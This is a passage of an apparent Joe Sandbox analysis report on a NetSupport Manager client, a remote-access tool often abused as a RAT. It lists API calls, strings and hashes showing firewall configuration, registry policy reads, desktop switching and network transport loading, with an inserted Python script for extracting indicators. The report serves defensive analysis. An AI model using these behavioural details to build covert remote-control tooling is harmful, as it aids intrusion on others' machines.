                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                                                    • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                                                    • API String ID: 83693535-1096744297
                                                                                                                                                    • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                                                                    • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                                                                                    • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                                                                    • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
APIs
  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
• GetTickCount.KERNEL32 ref: 1102CBCA
  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
• GetTickCount.KERNEL32 ref: 1102CCC4
  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
• CloseHandle.KERNEL32(?), ref: 1102CDD8
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
• String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
• API String ID: 596640303-1725438197
• Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
• Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
• Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
• Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
APIs
• RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
  • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
  • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
• RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
• RegCloseKey.ADVAPI32(?), ref: 110623A1
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Enum$Open$CloseValue
• String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
• API String ID: 2823542970-1528906934
• Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
• Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
• Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
• Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
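The records above are the per-function view Joe Sandbox exports: API bullets with module, arguments and a call-site address, and a Similarity block whose String ID line joins the referenced strings with "$". The Python below is an added example, not Joe Sandbox code and not part of this report; it parses that plain-text layout into records and pulls out the indicators a responder would carry forward (the policy key under HKLM, the licence file names, the geolocation URL and the build path). The layout regexes, the indicator categories and the sample text (three records copied from the listing above) are assumptions; a string that itself contains "$" cannot be recovered from the joined String ID line, and the hive decoding only applies where the report shows a literal HKEY constant as the first RegOpenKeyEx argument.

```python
"""Parse Joe Sandbox per-function listings and extract indicators.

Added example for this page, not Joe Sandbox code. Assumes the plain-text
layout of the records above: an "APIs" heading followed by
"• Name.MODULE(args), ref: ADDR" bullets, and a "Similarity" heading whose
"• String ID:" line joins the referenced strings with "$".
"""
from __future__ import annotations

import json
import re
from dataclasses import dataclass, field

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Yara matches", "Similarity"}
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
SIM_LINE = re.compile(r"^•\s*([A-Za-z ]+?):\s*(.*)$")
# Literal HKEY_* constants as they appear in the report's argument lists.
REG_HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                  # address of the call site
    via_subcall: str | None   # address of the callee when the call is indirect


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    similarity: dict[str, str] = field(default_factory=dict)
    source: str = ""


def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            if line == "APIs":          # every record starts with its API list
                if rec is not None:
                    records.append(rec)
                rec = FunctionRecord()
            section = line
            continue
        if not line.startswith("•"):
            continue
        if rec is None:                 # excerpt cut mid-record: keep its tail
            rec = FunctionRecord()
        if section == "APIs" and (m := API_LINE.match(line)):
            args = m["args"].split(",") if m["args"] else []
            rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
        elif section == "Similarity" and (m := SIM_LINE.match(line)):
            rec.similarity[m[1]] = m[2]
            if m[1] == "String ID":
                rec.strings = [s for s in m[2].split("$") if s]
        elif section == "Memory Dump Source" and line.startswith("• Source File:"):
            rec.source = line.split(":", 1)[1].strip()
    if rec is not None:
        records.append(rec)
    return records


def classify(s: str) -> str:
    """Heuristic indicator category for one referenced string (assumed rules)."""
    if re.match(r"^[a-z][a-z0-9+.-]*://", s, re.I):
        return "url"
    if re.match(r"^[a-z]:\\", s, re.I):
        return "build_path"          # e.g. a source path left in by the compiler
    if re.match(r"^(hkey_\w+|hklm|hkcu|software)\\", s, re.I):
        return "registry"
    if re.search(r"%[0-9]*[sdx]", s):
        return "format_string"       # log/debug templates, not IOCs by themselves
    if re.search(r"mutex$", s, re.I):
        return "mutex"
    if re.match(r"^[\w-]+\.[A-Za-z]{1,4}$", s):
        return "file"
    return "other"


def extract_iocs(records: list[FunctionRecord]) -> dict[str, set[str]]:
    out: dict[str, set[str]] = {}
    for rec in records:
        for s in rec.strings:
            out.setdefault(classify(s), set()).add(s)
    return out


def registry_keys_opened(records: list[FunctionRecord]) -> list[str]:
    """Rebuild HIVE\\subkey from RegOpenKeyEx/RegCreateKeyEx calls with literal args."""
    keys = []
    for rec in records:
        for c in rec.apis:
            if c.name.startswith(("RegOpenKey", "RegCreateKey")) and len(c.args) >= 2:
                hive = REG_HIVES.get(c.args[0])
                if hive and c.args[1] != "?":
                    keys.append(f"{hive}\\{c.args[1]}")
    return keys


def summarize(records: list[FunctionRecord]) -> dict:
    return {
        "functions": len(records),
        "apis": sorted({f"{c.module}!{c.name}" for r in records for c in r.apis}),
        "registry_keys": registry_keys_opened(records),
        "services": [c.args[1] for r in records for c in r.apis
                     if c.name.startswith("OpenService") and len(c.args) > 1 and c.args[1] != "?"],
        "iocs": {k: sorted(v) for k, v in extract_iocs(records).items()},
    }


# Constructed sample: three records copied (trimmed) from the listing above.
SAMPLE = r"""
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,1EF76653,?,00000000,00000000), ref: 1102D594
• OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
• QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
• Sleep.KERNEL32(000003E8), ref: 1102D632
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Yara matches
Similarity
• API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
• String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
APIs
  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
• GetTickCount.KERNEL32 ref: 1102CBCA
  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
Similarity
• API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
• String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
APIs
• RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
• RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
• RegCloseKey.ADVAPI32(?), ref: 110623A1
Similarity
• API ID: Enum$Open$CloseValue
• String ID: %s\%s\%s\$Client$DisableUserPolicies$Software\Policies\NetSupport\Client\Standard$Standard
"""

if __name__ == "__main__":
    print(json.dumps(summarize(parse_records(SAMPLE)), indent=2))
```

Run it against a saved text export of the report and feed the "url", "registry" and "file" categories to hunting; the "format_string" and "build_path" categories are fingerprinting material (the e:\nsmsrc\nsm\1210 path identifies the NetSupport build), not things to block.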
APIs
  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
• GetTickCount.KERNEL32 ref: 111385E2
  • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
  • Part of subcall function 11096D90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,111385EB), ref: 11096DBE
  • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?,?,?,?,?,?,?,111385EB), ref: 11096DDB
  • Part of subcall function 11096D90: CoUninitialize.OLE32(?,?,?,?,?,?,111385EB), ref: 11096DF9
• GetTickCount.KERNEL32 ref: 111385F1
• _memset.LIBCMT ref: 11138633
• GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
• _strrchr.LIBCMT ref: 11138658
• _free.LIBCMT ref: 111386AA
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
• String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
• API String ID: 711243594-1270230032
• Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
• Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
• Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
• Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
APIs
• ioctlsocket.WSOCK32 ref: 6CA87642
• connect.WSOCK32(00000000,?,?), ref: 6CA87659
• WSAGetLastError.WSOCK32(00000000,?,?), ref: 6CA87660
• _memmove.LIBCMT ref: 6CA876D3
• select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6CA876F3
• GetTickCount.KERNEL32 ref: 6CA87717
• ioctlsocket.WSOCK32 ref: 6CA8775C
• SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 6CA87762
• WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6CA8777A
• __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6CA8778B
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
• String ID: *BlockingIO$ConnectTimeout$General
• API String ID: 4218156244-2969206566
• Opcode ID: ee71c1577af3e80f93a9a509b08636e47b1b0b7132766e1616fbd74ee4973b1b
• Instruction ID: e4601db63b6c8ac1c16143196cc9e3b2d8f9d8a1c5809e0d5810b4654e65cc02
• Opcode Fuzzy Hash: ee71c1577af3e80f93a9a509b08636e47b1b0b7132766e1616fbd74ee4973b1b
• Instruction Fuzzy Hash: 18410B71A01315ABEB20DBA4CD4CBE973BAAF44304F004599F609E7641EB749ADDCBA1
APIs
• wsprintfA.USER32 ref: 11133B70
• GetTickCount.KERNEL32 ref: 11133BA1
• SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
• GetTickCount.KERNEL32 ref: 11133BBC
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: CountTick$FolderPathwsprintf
• String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe$.su
• API String ID: 1170620360-2478739915
• Opcode ID: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
• Instruction ID: ff3437da4bce093be243bc4ea55ba4e08a4d9634e929d706e548d7c9b68f93f5
• Opcode Fuzzy Hash: 3e33b262656940685e1aad64be50304ad358b3175c825220752b1feac52a0f54
• Instruction Fuzzy Hash: 68315BB5E1022EABD3209BB19D80FEDF3789B9031DF100065E815A7644EF71B9048795
APIs
  • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
  • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
  • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
  • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
  • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
  • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
• AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
• LoadMenuA.USER32(00000000,000003EC), ref: 11134DE8
• GetSystemMetrics.USER32(00000021), ref: 11134DF9
• GetSystemMetrics.USER32(0000000F), ref: 11134E01
• GetSystemMetrics.USER32(00000004), ref: 11134E07
• GetDC.USER32(00000000), ref: 11134E13
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 11134E1E
• ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
• CreateWindowExA.USER32(00000001,NSMWClass,034909E0,00CE0000,80000000,80000000,11142328,?,00000000,?,11000000,00000000), ref: 11134E7F
• GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
• String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
• API String ID: 1594747848-1114959992
• Opcode ID: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
• Instruction ID: ea278f5fd7360d42281fd81be3dd0b2008dee34a98883b586f11dcb677731357
• Opcode Fuzzy Hash: 66ba732ae51c7fd460c66f2128e0a3373d5a4979d1dd1b3930dacd21693fd196
• Instruction Fuzzy Hash: 04317075A40229ABDB149FE58D85FAEFBB8FB48709F100528FA11A7644D6746900CBA4
APIs
• _strtok.LIBCMT ref: 11027286
• _strtok.LIBCMT ref: 110272C0
• Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: _strtok$Sleep
• String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
• API String ID: 2009458258-3774545468
• Opcode ID: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
• Instruction ID: 2d05d95278d551eaaa07460440d96754ad32abd10519b78537541f164f63ece7
• Opcode Fuzzy Hash: 63e92d32746378da14513997d44a64d2e58a17b182b9feed40e1f111193f9b60
• Instruction Fuzzy Hash: EE513536E0166A8BDB11CFE4CC81FEEFBF4AF95308F644169E81567244D7316849CB92
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,6CA967B5), ref: 6CA88D6B
  • Part of subcall function 6CA84F70: LoadLibraryA.KERNEL32(psapi.dll,?,6CA88DC8), ref: 6CA84F78
• GetCurrentProcessId.KERNEL32 ref: 6CA88DCB
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6CA88DD8
• FreeLibrary.KERNEL32(?), ref: 6CA88EBF
  • Part of subcall function 6CA84FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 6CA84FC4
  • Part of subcall function 6CA84FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,6CA88E0D,00000000,?,6CA88E0D,00000000,?,00000FA0,?), ref: 6CA84FE4
• CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 6CA88EAE
  • Part of subcall function 6CA85000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 6CA85014
  • Part of subcall function 6CA85000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,6CA88E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 6CA85034
  • Part of subcall function 6CA82420: _strrchr.LIBCMT ref: 6CA8242E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
• Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
Yara matches
Similarity
• API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
• String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
• API String ID: 2714439535-3484705551
• Opcode ID: ccf2f491a8907615d6e4b8580a6d83bec60745516d3adfbf29b7e17c021a3b53
• Instruction ID: e9cb92d1dac2c5c92d054146936bacc042a06925d1aea51032a16a0cdae64de5
• Opcode Fuzzy Hash: ccf2f491a8907615d6e4b8580a6d83bec60745516d3adfbf29b7e17c021a3b53
• Instruction Fuzzy Hash: ED41F5B1B012199BEB149B51CD44FEA73B8EB45708F0445A9EA15E7A40EB30EAC9CB71
APIs
  • Part of subcall function 11089560: UnhookWindowsHookEx.USER32(?), ref: 11089583
• GetCurrentThreadId.KERNEL32 ref: 111037EC
• GetThreadDesktop.USER32(00000000), ref: 111037F3
• OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 11103803
• SetThreadDesktop.USER32(00000000), ref: 11103810
• CloseDesktop.USER32(00000000), ref: 11103829
• GetLastError.KERNEL32 ref: 11103831
• CloseDesktop.USER32(00000000), ref: 11103847
• GetLastError.KERNEL32 ref: 1110384F
Strings
• OpenDesktop(%s) failed, e=%d, xrefs: 11103857
• SetThreadDesktop(%s) ok, xrefs: 1110381B
• SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
Memory Dump Source
• Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
• Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_11000000_client32.jbxd
Yara matches
Similarity
• API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
• String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
• API String ID: 2036220054-60805735
• Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
• Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
• Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
• Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
APIs
• GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
• GetLastError.KERNEL32 ref: 1115F275
• wsprintfA.USER32 ref: 1115F288
  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
